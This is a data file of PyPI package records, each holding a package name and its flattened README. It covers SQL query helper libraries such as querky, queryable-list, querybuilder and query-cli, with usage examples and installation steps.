with the query result set.fromtornadoimportgen,ioloop,webimportqueriesclassMainHandler(web.RequestHandler):definitialize(self):self.session=queries.TornadoSession()@gen.coroutinedefget(self):results=yieldself.session.query('SELECT * FROM names')self.finish({'data':results.items()})results.free()application=web.Application([(r\"/\",MainHandler),])if__name__==\"__main__\":application.listen(8888)ioloop.IOLoop.instance().start()InspirationQueries is inspired byKenneth Reitz\u2019sawesome\nwork onrequests.HistoryQueries is a fork and enhancement ofpgsql_wrapper, which can be found in the\nmain GitHub repository of Queries as tags prior to version 1.2.0."} +{"package": "querify", "pacakge-description": "UNKNOWN"} +{"package": "querio", "pacakge-description": "Quer.ioDocumentation linksSeeDocumentationfor DocumentationSeeUsage guidefor a basic rundown on how to use Quer.ioSeeDatabase Schema 1for single table sample database schemaSeeDatabase Schema 2for normalized sample database schemaSeeML documentationfor documentation\non the machine learning modelProject descriptionThis project is built to the specifications and requirements provided by Prof. Michael Mathioudakis and is a course work project for course TKT20007 Software Engineering Lab at the University of Helsinki, department of Computer Science.The aim of this project is to build an Approximate Query Processing (AQP) engine -- i.e., a software layer on top of a relational database, that allows us to obtain fast, approximate answers to aggregate queries, with the help of Machine Learning models.Chosen implementation is a Python library that can be used with multiple different database systems. Machine learning components are built using Scikit Learn.InstallationThis project is done with Python 3.6SeeDatabase Installation guidefor information how to install the sample databases this application was tested on.SeeApplication Installation guidefor information how to install the application and all its dependencies.Optional installationSeeQuerio Schedulerfor how to install and use a scheduler for periodical model retraining.TestsCurrently the project contains tests that are done using theunittestlibrary. Tests can be run with the following command from the project rootpython3 -m unittest discoverThis command will find every test from the project and run it. If you want to run an individual test script it can be done with the following commandpython3 -m unittest [path to file]ContributorsDennis AhlforsJoonas JKim ToivonenMauri FrestadiusOssi R\u00e4is\u00e4Petja Valkama"} +{"package": "querius", "pacakge-description": "Querius ClientClient code for interacting with theQueriusAPI.InstallpipinstallqueriusUsagefromgoogle.cloudimportbigqueryfromqueriusimportQueriusClient,patch_bq_client_with_querius_clientfrompathlibimportPathbq_client=bigquery.Client()q_client=QueriusClient.from_service_account_path(api_url=\"\",service_account_path=Path('path/to/key.json'),customer_id=\"\",timeout_seconds=2)patch_bq_client_with_querius_client(bq_client,q_client)"} +{"package": "querky", "pacakge-description": "querkyTurn your SQL queries into type annotated Python functions and autogenerated types with a single decorator.ShowcaseThis example shows whatquerkySQL functions look like.Consider this PostgreSQL database schema:CREATETABLEaccount(idBIGSERIALPRIMARYKEY,usernameTEXTUNIQUENOTNULL,first_nameTEXTNOTNULL,last_nameTEXT,phone_numberTEXT,balanceBIGINTNOTNULLDEFAULT0,join_tsTIMESTAMPTZNOTNULLDEFAULTNOW(),referred_by_account_idBIGINTREFERENCESaccount(id));CREATETABLEpost(idBIGSERIALPRIMARYKEY,poster_idBIGINTNOTNULLREFERENCESaccount(id),messageTEXTNOTNULL,tsTIMESTAMPTZNOTNULLDEFAULTNOW());CREATETABLEpost_comment(idBIGSERIALPRIMARYKEY,post_idBIGINTNOTNULLREFERENCESpost(id),commenter_idBIGINTNOTNULLREFERENCESaccount(id),messageTEXTNOTNULL,tsTIMESTAMPTZNOTNULLDEFAULTNOW());And these are the queries defined on it:fromquerky_defimportqrk# an UPDATE query: no value returned@qrk.query# or @qrk.query(shape='status')defupdate_account_phone_number(account_id,new_phone_number):returnf'''UPDATEaccountSETphone_number ={+new_phone_number}WHEREid ={+account_id}'''# an INSERT query to always return a single value@qrk.query(shape='value',optional=False)definsert_account(username,first_name,last_name,phone_number,balance,referred_by_account_id):returnf'''INSERT INTOaccount(username,first_name,last_name,phone_number,balance,referred_by_account_id)VALUES({+username},{+first_name},{+last_name},{+phone_number},{+balance},{+referred_by_account_id})RETURNINGid'''# a SELECT query to return an array of single values@qrk.query(shape='column')defselect_top_largest_balances(limit):returnf'''SELECTbalanceFROMaccountORDER BYbalance DESCLIMIT{+limit}'''# now for the most interesting part: fetching rows# a SELECT query to return a single (one) AccountReferrer row or None (optional)@qrk.query('AccountReferrer',shape='one',optional=True)defget_account_referrer(account_id):returnf'''SELECTreferrer.id,referrer.username,referrer.first_name,referrer.last_name,referrer.join_tsFROMaccountINNER JOINaccount AS referrerONaccount.referred_by_account_id = referrer.idWHEREaccount.id ={+account_id}'''# a SELECT query to return many (an array of) AccountPostComment rows@qrk.query('AccountPostComment',shape='many')defselect_last_post_comments(post_id,limit):returnf'''SELECTaccount.first_name,account.last_name,post_comment.id,post_comment.messageFROMpost_commentINNER JOINaccountONpost_comment.commenter_id = account.idWHEREpost_comment.post_id ={+post_id}ORDER BYpost_comment.ts DESCLIMIT{+limit}'''So, as you can see, all you need is3 simple steps:Write a Python functionreturning the desired SQL query.Insert the argumentsexactly where you want them to be.Don't forget to prepend your arguments with a plus sign(+). Even though it is a regular Python format string,the resulting query is not SQL-injectable, as you'll later see.Add the@qrk.querydecoratorusing arguments to describe the expected shape and type of result set.Before you can use this code,you'll need theqrkobject.Bear with me, I'll show the full configuration in the next section, but, firstly, I would like to showthe results of runningquerky's code generator. Here it is:# ~ AUTOGENERATED BY QUERKY ~ #importdatetimefromasyncpgimportConnectionfromdataclassesimportdataclassfromsql.exampleimportupdate_account_phone_numberas_q0fromsql.exampleimportinsert_accountas_q1fromsql.exampleimportselect_top_largest_balancesas_q2fromsql.exampleimportget_account_referreras_q3fromsql.exampleimportselect_last_post_commentsas_q4asyncdefupdate_account_phone_number(__conn:Connection,/,account_id:int,new_phone_number:str)->str:returnawait_q0.execute(__conn,account_id,new_phone_number)asyncdefinsert_account(__conn:Connection,/,username:str,first_name:str,last_name:str,phone_number:str,balance:int,referred_by_account_id:int)->int:returnawait_q1.execute(__conn,username,first_name,last_name,phone_number,balance,referred_by_account_id)asyncdefselect_top_largest_balances(__conn:Connection,/,limit:int)->list[int]:returnawait_q2.execute(__conn,limit)@dataclass(slots=True)classAccountReferrer:id:intusername:strfirst_name:strlast_name:strjoin_ts:datetime.datetimeasyncdefget_account_referrer(__conn:Connection,/,account_id:int)->AccountReferrer|None:returnawait_q3.execute(__conn,account_id)_q3.bind_type(AccountReferrer)@dataclass(slots=True)classAccountPostComment:first_name:strlast_name:strid:intmessage:strasyncdefselect_last_post_comments(__conn:Connection,/,post_id:int,limit:int)->list[AccountPostComment]:returnawait_q4.execute(__conn,post_id,limit)_q4.bind_type(AccountPostComment)__all__=[\"select_last_post_comments\",\"AccountPostComment\",\"AccountReferrer\",\"insert_account\",\"update_account_phone_number\",\"get_account_referrer\",\"select_top_largest_balances\",]So, let's analyze what we got:We have all of our input and output types defined. The linter can now help us whenever we use any of these functions and types in our code.Whenever the database schema changes, the types and function arguments will accommodate automatically: just run the generation script again - and you're set.All the types were inferred from a live database connection, because your database is the single source of truth for your data, not the application.Our \"models\" are database rows. At last.Do not be discouraged, if you don't like using dataclasses in your projects, as this is just an example!So, if you like what you're seeing, let's configure your project!Basic ConfigurationasyncpgTo install, runpip install querky[asyncpg]Consider this project structure:src\n|__ querky_def.py\n|__ querky_gen.py\n|__ sql\n |__ example.pysqlfolder contains.pyfiles with the query functions. Generated code will be placed in thesql/queriesfolder under the same name as the inital script (example.pyin this case).querky_gen.pyfile is the code generation script. You run it when you want to regenerate the query functions:importasynciofromquerky.presets.asyncpgimportgeneratefromquerky_defimportqrkimportsqlfromenvimportCONNECTION_STRINGif__name__==\"__main__\":asyncio.run(generate(qrk,CONNECTION_STRING,base_modules=(sql,)))querky_def.pyis code generator configuration. We'll use a preset for the sake of simplicity.importosfromquerky.presets.asyncpgimportuse_presetqrk=use_preset(os.path.dirname(__file__),type_factory='dataclass+slots')The first argument should be the path to the root directory of your project.If you'd like more fine-grained control over theQuerkyobject, there will be an explaination in the later sections.After the configuration of theqrkobject it's time to run thequerky_gen.pyscript.Each of your queries will become type hinted, each of them will return a real Python object,\nand you can call these queries as regular Python functions.Every time you change your database schema or queries, you can now expect the changes to propagate throughout your code.\nBecause of that,refactoring SQL-dependent code has never been easier.This time the linter is on your side.Do not change the generated files, as they are transient and will be overwritten.\nIf you need to modify the generated code, consider usingon_before_func_code_emitandon_before_type_code_emithooks passed in to theQuerkyobject constructor.Type Hinting ExtensionsArgumentsOptionalsA careful reader might have noticed, that the generated argument types are never optional.\nIf we go back to the database schema, we will notice, that some of the columns areNULLABLE.\nAnd yet, ininsert_accountquery the respective arguments are notOptional.Why is that?Unfortunately, there is nostraightforwardway for the library to automate this process,\nbecause SQL-wise these are constraints, and not data types.So, it's our job to hint the library to do the right thing.Let's look at the signature of this function again:@qrk.query(shape='value',optional=False)definsert_account(username,first_name,last_name,phone_number,balance,referred_by_account_id):...We know thatphone_number,last_nameandreferred_by_account_idare optional. So we just hint them like this:importtyping@qrk.query(shape='value',optional=False)definsert_account(username,first_name,last_name:typing.Optional,phone_number:typing.Optional,balance,referred_by_account_id:typing.Optional):...Then, the generated function's signature will look like this:asyncdefinsert_account(__conn:Connection,/,username:str,first_name:str,last_name:str|None,phone_number:str|None,balance:int,referred_by_account_id:int|None)->int:...Default valuesLet's consider the sameinsert_accountquery.Let's makereferred_by_account_idNoneby default:@qrk.query(shape='value',optional=False)definsert_account(username,first_name,last_name:typing.Optional,phone_number:typing.Optional,balance,referred_by_account_id=None):...We'll get this signature:asyncdefinsert_account(__conn:Connection,/,username:str,first_name:str,last_name:str|None,phone_number:str|None,balance:int,referred_by_account_id:int|None=_q1.default.referred_by_account_id)->int:..._q1is a reference to the originalinsert_accountQueryobject, which contains the default value for this argument.This way any kind of default argument can be used,\nsince the generated function always references the original value.Notice that we got rid oftyping.Optionalfromreferred_by_account_id's annotation,\nyet the generated signature is stillint | None.\nThis \"type-inference\" behavior holds only for theNonedefault value.Enforce typeSometimes even type inference from the database itself does not help.\nA prime example would be the infamouspostgres'ARRAY[]type.\nValues of this type can have an arbitrary number of dimensions.Postgres docs:The current implementation does not enforce the declared number of dimensions either. Arrays of a particular element type are all considered to be of the same type, regardless of size or number of dimensions. So, declaring the array size or number of dimensions in CREATE TABLE is simply documentation; it does not affect run-time behavior.But oftentimes we find ourselves with a well-known structure,\neven though the type itself is permissive (hello, Python!).Consider this query:@qrk.query(shape='value',optional=False)defare_2d_matrices_equal(m):returnf\"SELECT{+m}= ARRAY[[1,2,3], [1,2,3], [1,2,3]]::INTEGER[]\"It yields this signature:asyncdefare_2d_matrices_equal(__conn:Connection,/,m:list[int])->bool:...Now, let's enforce our knowledge, that this array is two-dimensional.The way we do it is by regular PEP484 annotations:@qrk.query(shape='value',optional=False)defare_2d_matrices_equal2(m:'list[list[int]]'):returnf\"SELECT{+m}= ARRAY[[1,2,3], [1,2,3], [1,2,3]]::INTEGER[]\"And get this in return:asyncdefare_2d_matrices_equal2(__conn:Connection,/,m:list[list[int]])->bool:...Overriding annotations must always be strings.This is because they are literally copied from the source file into the generated one by using function annotation introspection.\nIf they were objects, this wouldn't be reliable.Return typesThe same problems apply to fields of a row.They, same as arguments, can be optional, can have a different type from the inferred one.For example, let's pimp theget_account_referrerquery, sincelast_nameis nullable.To do that, we need to import theattrobject:fromquerkyimportattr@qrk.query('AccountReferrer',shape='one',optional=True)defget_account_referrer(account_id):returnf'''SELECTreferrer.id,referrer.username,referrer.first_name,referrer.last_name AS{attr.last_name(optional=True)},referrer.join_tsFROMaccountINNER JOINaccount AS referrerONaccount.referred_by_account_id = referrer.idWHEREaccount.id ={+account_id}'''The generated type will now look like this:@dataclass(slots=True)classAccountReferrer:id:intusername:strfirst_name:strlast_name:str|Nonejoin_ts:datetime.datetimeNotice, howlast_nameis now optional.You can also use-attr.last_namesyntax for optional fields.To override the generated annotation use this syntax:@qrk.query(shape='one')defget_row():returnf'''SELECTARRAY[[1,2,3], [1,2,3], [1,2,3]]::INTEGER[] AS{attr.matrix2d('list[list[int]]')},ARRAY[[[1,2,3],[1,2,3]], [[1,2,3],[1,2,3]], [[1,2,3],[1,2,3]]]::INTEGER[] AS{attr.matrix3d('list[list[list[int]]]')},'Looks like text' AS{attr.definitely_not_text('float')}'''Generates this:@dataclass(slots=True)classSimpleRow:matrix2d:list[list[int]]matrix3d:list[list[list[int]]]definitely_not_text:floatThis looks a bit like magic, but here is how it works:attrobject is a singleton, which records each__getattr__invocation, returning anAttrobject in its stead.\nWhen theAttrobject is called, it records the arguments, and returns a string with which the__getattr__was invoked.\nOnce the code inside@qrk.querydecorated function is run,\nit flushes all the recordedAttrobjects into the query. Then, when the code is being generated,\nthose objects serve to complete the type information about their respective fields.Different queries - same return typeSometimes there is a couple of different ways to get to the same data.Consider these queries:@qrk.query('AccountInfo',shape='one')defget_account(account_id):returnf'''SELECTfirst_name,last_name,username,phone_numberFROMaccountWHEREid ={+account_id}'''@qrk.query('???',shape='one')defget_last_joined_account():returnf'''SELECTfirst_name,last_name,username,phone_numberFROMaccountORDER BYjoin_ts DESCLIMIT1'''What do we call the second type to not clash with the first one?AccountInfo2?It can be done this way, however this would potentially\nlead to many weirdly named duplicate types across the project.Instead, just pass in theget_accountquery in place of the first parameter:@qrk.query(get_account,shape='one')defget_last_joined_account():...This way the type won't be generated the second time,\nand the code will use the \"parent type\" in runtime.You can use queries from other modules, too. Just import them and use as shown,\nandquerkywill infer the required imports and place them in the generated file.Query reuseSincequerkyqueries are simple f-strings, there is no limit to combining them together via CTEs or\nsimply replacing a part of your query with another one.You can use subqueries as arguments to the main query with this technique:fromquerkyimportsubquery@qrk.query(shape='value',optional=False)defadd(a,b):returnf\"SELECT{+a}::INTEGER +{+b}\"@qrk.query(shape='value',optional=False)defmultiply(a,b):returnf\"SELECT{+a}::INTEGER *{+b}\"@qrk.query(shape='value',optional=False)defdivide(a,b):returnf\"SELECT{+a}::INTEGER /{+b}\"@qrk.query(shape='value',optional=False)defoperation(a,b):@subquerydefadd_ab():returnadd.query(a,b)@subquerydefmult_ab():returnmultiply.query(a,b)returndivide.query(add_ab,mult_ab)The resulting SQL will be:SELECT(SELECT$1::INTEGER+$2)::INTEGER/(SELECT$1::INTEGER*$2)We use::INTEGERcast to explicitly tell the database that in this query we work with integers.\nOtherwise, query \"compilation\" will fail, because+,-and/operators exist for many types,\nso there is no definitive way for the DBMS to infer what we meant.If it's not enough for you, you can generate SQL by joining strings,\nthe universal oldest method of how the ancients did it.\nOr use another library for this particular task.Just remember thatthe decorated function actually runs only onceto generate the SQL query.\nAt runtimequerkyalways uses that SQL query, never rerunning the function again.\nExcept, of course, for explicitQuery#query(...)calls, but these don't changeQuerystate in any way.If you need query folding capabilities, e.g.INSERTa variable number of rows with a single query,\nbe sure to look into thequerky.tools.query_foldermodule.How it WorksTheQuerkyclassIt is the class to configure how the library will talk to the database and provide code generator configurations.Let's go over constructor's arguments one by one:basedirThe absolute path to the base directory of your project.This path serves as an anchor, so that the generated files are placed properly.annotation_generatorIt's an instance ofAnnotationGeneratorsubclass, which, well, generates annotations both for arguments and for return types,\nbased onTypeKnowledgecollected.It's safe to use theClassicAnnotationGeneratorfor every use-case here.contractThis is an instance ofContractsubclass. ThisContractis betweenquerkyand your database driver of choice.TheContractdescribes a common interface forquerkyto talk to the database, execute your queries and infer the types.conn_param_configThis directive tellsquerkywhere you want to place your database connection argument for every generated function.Available subclasses:FirstandLast.type_factoryThis function createsoneandmanyqueries' return types. The currently implemented types are underquerky/type_constructors.TypedDictConstructor- generates a subclass oftyping.TypedDict. It's a regular dictionary with linter support.DataclassConstructor- generates a class decorated with@dataclasses.dataclass(...). Any additional**kwargspassed toDataclassConstructor's constructor will be reflected in the decorator. E.g.kw_only=True,slots=True.EveryTypeConstructorhas arow_factoryargument, which should be provided in case your database driver does not return the expected type.Therow_factoryis simply a converter from whatever the database driver returns to the type you need.In this example, we convert nativeasyncpg'sRecordobjects to Pythondataclasses.It is up to the user to implementrow_factory.subdirName of the subdirectory, where all the generated files will go.E.g., consider this project layout:payment_service\n|__ payments.py\n|__ withdrawals.py\n|__ __init__.py\ndelivery_service\n|__ deliveries.py\n|__ products.py\n|__ __init__.pyConsidering every.pyfile has queries andsubdir=\"queries\",\nwe're going to end up with the following structure:payment_service\n|__ queries\n |__ payment.py\n |__ withdrawal.py\n|__ payment.py\n|__ withdrawal.py\n|__ __init__.py\ndelivery_service\n|__ queries\n |__ delivery.py\n |__ product.py\n|__ delivery.py\n|__ product.py\n|__ __init__.pyIf not specified, files will be placed under the same directory as the source file, but with_queriespostfix appended.The previously mentioned structure would become:payment_service\n|__ payment.py\n|__ payment_queries.py\n|__ withdrawal.py\n|__ withdrawal_queries.py\n|__ __init__.py\ndelivery_service\n|__ delivery.py\n|__ deliviry_queries.py\n|__ product.py\n|__ product_queries.py\n|__ __init__.pyYou can change the naming behavior by overridingQuerky#generate_filename.Custom Database Typesasyncpgtype_mapperIf you define custom types in yourpostgresdatabase,\nyou should also put conversions into theAsyncpgNameTypeMapperobject using theset_mappingmethod,\notherwisequerkywouldn't know about them.asyncpg's basic conversions are definedhere.These are all availableasyncpgdefault types:@qrk.query(shape='one',optional=False)defall_default_types():returnf'''SELECTNULL::INTEGER[] AS _anyarray,NULL::TSRANGE AS _anyrange,NULL::NUMMULTIRANGE AS _anymultirange,NULL::RECORD AS _record,NULL::VARBIT AS _bitstring,NULL::BOOL AS _bool,NULL::BOX AS _box,NULL::BYTEA AS _bytes,NULL::TEXT AS _text,NULL::CIDR AS _cidr,NULL::INET AS _inet,NULL::MACADDR AS _macaddr,NULL::CIRCLE AS _circle,NULL::DATE AS _date,NULL::TIME AS _time,NULL::TIME WITH TIME ZONE AS _timetz,NULL::INTERVAL AS _interval,NULL::FLOAT AS _float,NULL::DOUBLE PRECISION AS _double_precision,NULL::SMALLINT AS _smallint,NULL::INTEGER AS _integer,NULL::BIGINT AS _bigint,NULL::NUMERIC AS _numeric,NULL::JSON AS _json,NULL::JSONB AS _jsonb,NULL::LINE AS _line,NULL::LSEG AS _lseg,NULL::MONEY AS _money,NULL::PATH AS _path,NULL::POINT AS _point,NULL::POLYGON AS _polygon,NULL::UUID AS _uuid,NULL::TID AS _tid'''@dataclass(slots=True)classAllDefaultTypes:_anyarray:list[int]_anyrange:_Range_anymultirange:list[_Range]_record:_Record_bitstring:_BitString_bool:bool_box:_Box_bytes:bytes_text:str_cidr:Union[IPv4Network,IPv6Network]_inet:Union[IPv4Interface,IPv6Interface,IPv4Address,IPv6Address]_macaddr:str_circle:_Circle_date:datetime.date_time:datetime.time_timetz:datetime.time_interval:datetime.timedelta_float:float_double_precision:float_smallint:int_integer:int_bigint:int_numeric:Decimal_json:str_jsonb:str_line:_Line_lseg:_LineSegment_money:str_path:_Path_point:_Point_polygon:_Polygon_uuid:UUID_tid:tupleParameter Substitutionquerkynever uses string concatenation to put arguments into a query. SQL injection is impossible.What it does instead is create a parametrized query based on yourContract(database driver)\nand your decorated function's signature.You can make sure by checking out any of your queries'sqlfield -\nit contains the actual SQL query that will always be used for this particularQueryobject.The core of parameter substitution are theParamMapperandMappedParamclasses.When a function is decorated with@qrk.query, it gets wrapped with aQueryobject.TheQueryobject in turn calls the function inside its__init__method with all arguments\nsubstituted withMappedParamobjects generated by yourContractbackend'sParamMapperobject. EachParamMapperobject is unique per query.The f-string gets run and theMappedParamobjects \"remember\" the positions of the arguments inside the query.After that theParamMapperobject is always ready to remap any incoming arguments into your database driver's format, since it knows the signature of the function, the order of arguments and which arguments they were.Query \"compilation\"Once you run thequerky_gen.pyscript, all the queries arePREPAREd against the DBMS to\nlet it infer the types and check the correctness of the queries.\nYou can call it a kind of \"compilation step\".\nWhich, by the way,conveniently checks query correctness before the program is run, meaning, that if you have\na syntax error, the DBMSitselfwill tell you that, before you ship your code.Tips and TricksUsing ORM models for schema hintingI personally found it very convenient to use ORM models to have\na copy of the expected database schema state.This way you can use the linter to your advantage when refactoring code: e.g. if a column gets dropped,\nthe linter will be screaming \"this field does not exist\" for every query you used it in.I suggest exploring thesqlacodegenpackage to tackle the issue.Code generation is not requiredQueryobjects are actually callable, if you look at the sample generated code. So, you don't need the code generation\nprocedure to use the argument mapping capabilities of this package.Issues, Help and DiscussionsIf you encountered an issue, you can leave it here, on GitHub.If you want to join the discussion, there are Telegram chats:English Language Chat \ud83c\uddfa\ud83c\uddf8\ud83c\uddec\ud83c\udde7Russian Language Chat \ud83c\uddf7\ud83c\uddfaIf you need to contact me personally:Email:verolomnyy@gmail.comTelegram:@datscrazyLicenceMIT License\n\nCopyright (c) 2023 Andrei Karavatski"} +{"package": "querpyable", "pacakge-description": "QuerpyableA Python implementation of LINQ:bulb: ExampleCalculating the first 10000 primesQueryable\\.range(2,1_000_000)\\.where(lambdan:all(n%i!=0foriinrange(2,int(n**0.5)+1)))\\.take(10000):cd: InstallationpipinstallquerpyableIn order to locally set up the project please follow the instructions below:# Set up the GitHub repositorygitinit\ngitconfig--localuser.nameVasilisSioros\ngitconfig--localuser.emailbillsioros97@gmail.com\ngitadd.\ngitcommit-m\"feat: initial commit\"gitremoteaddoriginhttps://github.com/billsioros/querpyable# Create a virtual environment using poetry and install the required dependenciespoetryshell\npoetryinstall# Install pre-commit hookspre-commitinstall--install-hooks:book: DocumentationThe project's documentation can be foundhere.:heart: Support the projectFeel free toBuy me a coffee! \u2615.:sparkles: ContributingIf you would like to contribute to the project, please go through theContributing Guidelinesfirst.:label: CreditsThis project was generated withbillsioros/cookiecutter-pypackagecookiecutter template."} +{"package": "query", "pacakge-description": "queryis a simple module for quickly, interactively exploring a SQL\ndatabase. Together with IPython, it supports quick tab-completion of table\nand column names, convenience methods for quickly looking at data (e.g.,.head(),.tail()), and the ability to get a rich interactive database\nconnection up in only 2 lines by setting a few required environmental\nvariables.Demo in 2 linesExplore the included demo database:fromqueryimportQueryDbdb=QueryDb(demo=True)Real-world use case in 2 linesOr set a few environmental variables (QUERY_DB_DRIVER,QUERY_DB_HOST,QUERY_DB_PORT,QUERY_DB_NAME, andQUERY_DB_PASS) and get started just as quickly:fromqueryimportQueryDB# capital 'B' is OK too :)db=QueryDB()Interactive exampleLinksCode and additional details on Github:"} +{"package": "queryable", "pacakge-description": "MemDBSQLite in-memory database without the boilerplateIf you know would like to work with a SQL-based data structure\nin memory, this module makes your life as easy as possible"} +{"package": "queryable-list", "pacakge-description": "python-queryable-listForget classical list filtering and enjoy yourself by generating flexible and\nfluent list queries with QueryableList.What is the purpose?List filtering sometimes may be difficult and boring especially when you\nneed to apply consecutive filters. This library is inspired by flexibility\nof Django ORM and LinQ. I also believe it looks more readable to write\nall filters in the same context.Let's assume we have a list named numbers that contains duplicated numbers,\nand we need to use a filter that is so:max(list(set(filter(lambdax:x>20,numbers)))[11:])Maybe you think I exaggerated but real life problems can even be more confusing.Let's assume the number is a QueryableList.\nThe above filter can be rewritten readable such that with QueryableList:numbers.filter(lambdax:x>20).distinct().skip(11).max()Also your queries will be reusable because QueryableList works lazy:persons=[{'first_name':'John','last_name':'Doe','age':22},{'first_name':'John','last_name':'Smith','age':33},...]query=QueryableList(persons).select('last_name','age')query2=query.select_list('age',flat=True)query3=query.select_list('last_name')print(list(query))print(list(query2))print(list(query3))# Outputs# [{'last_name': 'Doe', 'age': 22}, {'last_name': 'Smith', 'age': 33}]# [22, 33]# [['Doe'], ['Smith']]All the queries don't work in their building step as you can see . They\nworked at the time they were called via list(). In this wayquerycould\nbe used to buildquery2andquery3queries.Which Python versions are supported?Python 2.7 and Python 3.5+ versions are supported. A lot of unit tests are\nwritten to consider all the cases on different Python versions.Installationpipinstallqueryable-listRunning TestsRun this command by using your virtual environment.python-munittestdiscover"} +{"package": "queryandprocessdata", "pacakge-description": "Proteus genProcess File"} +{"package": "queryandprocessdatautility", "pacakge-description": "Proteus genProcess File"} +{"package": "query-anon", "pacakge-description": "A tool to anonymize SQL queries."} +{"package": "query-blockchain-state-lib", "pacakge-description": "Query Blockchain State LibThis repo is inherited fromQueryStateLibInstallpip3 install query-blockchain-state-libExample do query state batch at clientExample usedGithub :https://github.com/Centic-io/query-blockchain-state-libUseEthereum Json-pcBaseUse Ethereum JSON-RPC call to interact with EVM node providerPostman usage:Link"} +{"package": "querybuilder", "pacakge-description": "For the following Table example:CREATETABLEarticle(idintegerNOTNULL,createdtimestampwithouttimezoneNOTNULL,titlecharactervarying(255)NOTNULL,type_idintegerNOTNULL,topic_idintegerNOTNULL,author_idsinteger[]NOTNULL,category_idsinteger[],tagscharactervarying(255)[],keywordscharactervarying(255)[],summarytext,contenttextNOTNULL,coverjsonbNOTNULL,editors_pickbooleanNOTNULL,pageviewsbigintNOTNULL,updatedtimestampwithouttimezoneNOTNULL,publishedtimestampwithouttimezone,permalinkcharactervarying(255),cust_metajsonb);SpecificationsFor all articles withtype_idequal to1(type_id = 1):json { \"EQ\": { \"type_id\": 1 } }Same structure is\nfor:ConditionJSON KEYSymbolJSON QueryLess thanLT<{\"LT\": {\"type_id\": 2}}Less than or Equal toLE<={\"LE\": {\"type_id\": 2}}Greater thanGT>{\"GT\": {\"type_id\": 2}}Greater than or Equal toGE>={\"GE\": {\"type_id\": 2}}Not equalNE!={\"NE\": {\"type_id\": 2}}INFor all articles wheretype_idis in[1, 2, 3], the JSON query\nwill be:{\"IN\":{\"pageviews\":[1,2,3]}}BETWEENFor all articles withpageviewsbetween 10000 and 15000, the JSON\nquery will be:{\"BETWEEN\":{\"pageviews\":[10000,15000]}}CONTAINS_ANYFor all articles whereauthor_idscontains any of8, 9, 10, the\nJSON query will be:{\"CONTAINS_ANY\":{\"author_ids\":[8,9,10]}}CONTAINS_ALLFor all articles whereauthor_idscontains all of8, 9, the JSON\nquery will be:{\"CONTAINS_ALL\":{\"author_ids\":[8,9]}}STARTSWITHFor all articles wheretitlestarts withFilm Review, the\nJSON query will be:{\"STARTSWITH\":{\"title\":\"Film Review\"}}Complex QueriesComplex queryies can contain nested structures ofORorANDor both.For all articles withpageviewsbetween 10000 and 15000 and whoseauthor_idscontains8(the author\u2019s ID) (in above schema,author_idsis an ArrayField in Postgres), the JSON query will be:{\"AND\":[{\"BETWEEN\":{\"pageviews\":[10000,15000]}},{\"CONTAINS\":{\"author_ids\":[8]}}]}RequirementsIf there is only one condition, likepageviews> 100, the query\ncan directly contain outermost key as one ofEQ, NE, GT, GE, LT, LE, STARTSWITH, CONTAINS, CONTAINS_ALL, CONTAINS_ANY, BETWEEN.example:{\"STARTSWITH\":{\"title\":\"Film Review\"}}But if there are more conditions involved, the outermost key must be\none of `OR"} +{"package": "query-builder", "pacakge-description": "No description available on PyPI."} +{"package": "query-chain", "pacakge-description": "No description available on PyPI."} +{"package": "querychart-package", "pacakge-description": "querychartsql graphs based on matplotlibinstall matplotlibpip install matplotlibmarker refhttps://www.w3schools.com/python/matplotlib_markers.asp"} +{"package": "query-cli", "pacakge-description": "# queryThis is a simple, yet powerful command line translator with baidu translate\u547d\u4ee4\u884c\u4e0b\u7ffb\u8bd1\u5de5\u5177\uff0c\u7ffb\u8bd1\u670d\u52a1\u57fa\u4e8e\u767e\u5ea6\u7ffb\u8bd1https://github.com/yangyang-zhang/query## install \u5b89\u88c5pip install query-cli## Usage \u7528\u6cd5### English To Chinese\uff08\u82f1\u6587\u7ffb\u8bd1\u4e2d\u6587\uff09```query apple******************************apple:\u82f9\u679c*****************************```### Chinese To English\uff08\u4e2d\u6587\u7ffb\u8bd1\u82f1\u6587\uff09```query -t en \u82f9\u679c******************************\u82f9\u679c:Apple*****************************```> \u76ee\u6807\u7ffb\u8bd1\u8bed\u8a00\u652f\u6301\u82f1\u8bed\u3001\u65e5\u8bed\u3001\u5fb7\u8bed\u7b49\u51e0\u5341\u79cd\u8bed\u8a00\uff0c\u7528 -t \u6307\u5b9a\u7ffb\u8bd1\u76ee\u6807\u8bed\u8a00\u5373\u53ef### Chinese To Japan\uff08\u4e2d\u6587\u7ffb\u8bd1\u65e5\u6587\uff09```query -t jp \u6211\u662f\u8c01******************************\u6211\u662f\u8c01:\u79c1\u306f\u8ab0\u3067\u3059\u304b*****************************```## query \u4f5c\u4e3a\u4e00\u4e2a\u6a21\u5757\u5bfc\u5165>\u9ed8\u8ba4\u7ffb\u8bd1\u4e3a\u4e2d\u6587,\u7b2c\u4e8c\u4e2a\u53c2\u6570\u4e3a\u7ffb\u8bd1\u76ee\u6807\u8bed\u8a00```>>> from query import Query>>> q = Query('apple')>>> q.translate()apple:\u82f9\u679c{'src_result': 'apple', 'trans_result': '\u82f9\u679c'}>>> q = Query('english', 'wyw')>>> q.translate()english:\u82f1\u5409\u5229\u8bed{'src_result': 'english', 'trans_result': '\u82f1\u5409\u5229\u8bed'}```"} +{"package": "query-client", "pacakge-description": "Query ClientThis is a simple client to query.example\u521d\u59cb\u5316\u5ba2\u6237\u7aef\u53ca\u5143\u6570\u636efromquery_clientimportQueryClientqc=QueryClient()tables=qc.get_meta()# print(tables) \u83b7\u53d6\u5168\u90e8\u53ef\u67e5\u8868,\u53ca\u5176coloumns, \u5143\u6570\u636e## \u76ee\u524d\u53ea\u6709\u4e24\u4e2a\u76f8\u5173\u8868\u6ce8\u518ccan_table=tables[\"can_detail\"]pcd_table=tables[\"pcd_label_desc\"]fetchpythonfromsqlalchemy.sql.expressionimportselect,text,and_fromquery_clientimportQueryClientimportpandasaspdqc=QueryClient()tables=qc.get_meta()mytable=tables[\"pcd_label_desc\"]# 1. fetch_by_stmt \u521d\u59cb\u5316 statement, select/where/group_bystmt=select(mytable.c.dataset,mytable.c.batch_path,text(\"array_distinct(categories) scenes\"),text(\"cardinality(filter(categories, x -> x IN ('car'))) as target_cnt\"))r=qc.fetch_by_stmt(stmt)df=pd.DataFrame(r)# 2. fetch_by_sqlquery=\"select * from pcd_label_desc limit 